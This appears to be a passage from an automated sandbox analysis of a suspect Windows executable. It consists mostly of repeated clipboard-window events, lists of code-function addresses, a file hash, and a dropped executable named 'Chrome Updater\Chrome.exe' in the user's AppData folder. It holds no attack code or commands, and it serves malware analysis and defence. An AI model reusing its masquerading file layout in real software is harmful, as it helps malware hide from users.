        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_06C361CC0_2_06C361CC
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_06C338980_2_06C33898
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_06C343DD0_2_06C343DD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_06C364B70_2_06C364B7
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C46F0700_2_6C46F070
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4C90100_2_6C4C9010
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C414C300_2_6C414C30
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E6CC00_2_6C3E6CC0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C414D600_2_6C414D60
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C442D000_2_6C442D00
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C440D300_2_6C440D30
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C430E600_2_6C430E60
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DAF2E0_2_6C3DAF2E
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3F0F400_2_6C3F0F40
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C424F800_2_6C424F80
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C42AF800_2_6C42AF80
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3EA8600_2_6C3EA860
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C45E8D00_2_6C45E8D0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C45A9F00_2_6C45A9F0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4E6A200_2_6C4E6A20
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C430AA00_2_6C430AA0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4BEB000_2_6C4BEB00
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E0B600_2_6C3E0B60
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4DE4900_2_6C4DE490
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3FC4D00_2_6C3FC4D0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4564B00_2_6C4564B0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C45C6400_2_6C45C640
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C42C6700_2_6C42C670
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4326A00_2_6C4326A0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C47E7400_2_6C47E740
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3F00000_2_6C3F0000
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3F61600_2_6C3F6160
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4141F00_2_6C4141F0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4261800_2_6C426180
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4241900_2_6C424190
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4AC2500_2_6C4AC250
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4022B00_2_6C4022B0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C409C400_2_6C409C40
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C42BC700_2_6C42BC70
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C499CD00_2_6C499CD0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C413CE00_2_6C413CE0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D5CF70_2_6C3D5CF7
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C445CB00_2_6C445CB0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C441CB00_2_6C441CB0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C41FD100_2_6C41FD10
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4A1D300_2_6C4A1D30
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C433A100_2_6C433A10
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C403BC00_2_6C403BC0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C415BA00_2_6C415BA0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3FB4400_2_6C3FB440
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C43D4800_2_6C43D480
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4C55800_2_6C4C5580
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E75E00_2_6C3E75E0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4B76600_2_6C4B7660
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4276300_2_6C427630
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C45D7600_2_6C45D760
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4197200_2_6C419720
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4DF7F00_2_6C4DF7F0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E97D00_2_6C3E97D0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4DD0600_2_6C4DD060
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E100E0_2_6C3E100E
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E31170_2_6C3E3117
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DD1090_2_6C3DD109
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4E52E00_2_6C4E52E0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E73200_2_6C3E7320
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4B93800_2_6C4B9380
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_0108D5300_2_0108D530
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_0108CB780_2_0108CB78
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeCode function: 5_2_01214D705_2_01214D70
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeCode function: 5_2_012156405_2_01215640
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeCode function: 5_2_01214A285_2_01214A28
        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\System.Data.SQLite.EF6.dll 857A287F7F39097C2F70FF0CE681D35196DAEE60B43F255BC72B842A351208C4
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DDE20 appears 34 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DEF90 appears 121 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DDDA0 appears 31 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DEDF0 appears 233 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C493AB0 appears 33 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DF0B0 appears 36 times
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: String function: 6C4DDFC0 appears 153 times
        Source: LnSNtO8JIa.exeBinary or memory string: OriginalFilename vs LnSNtO8JIa.exe
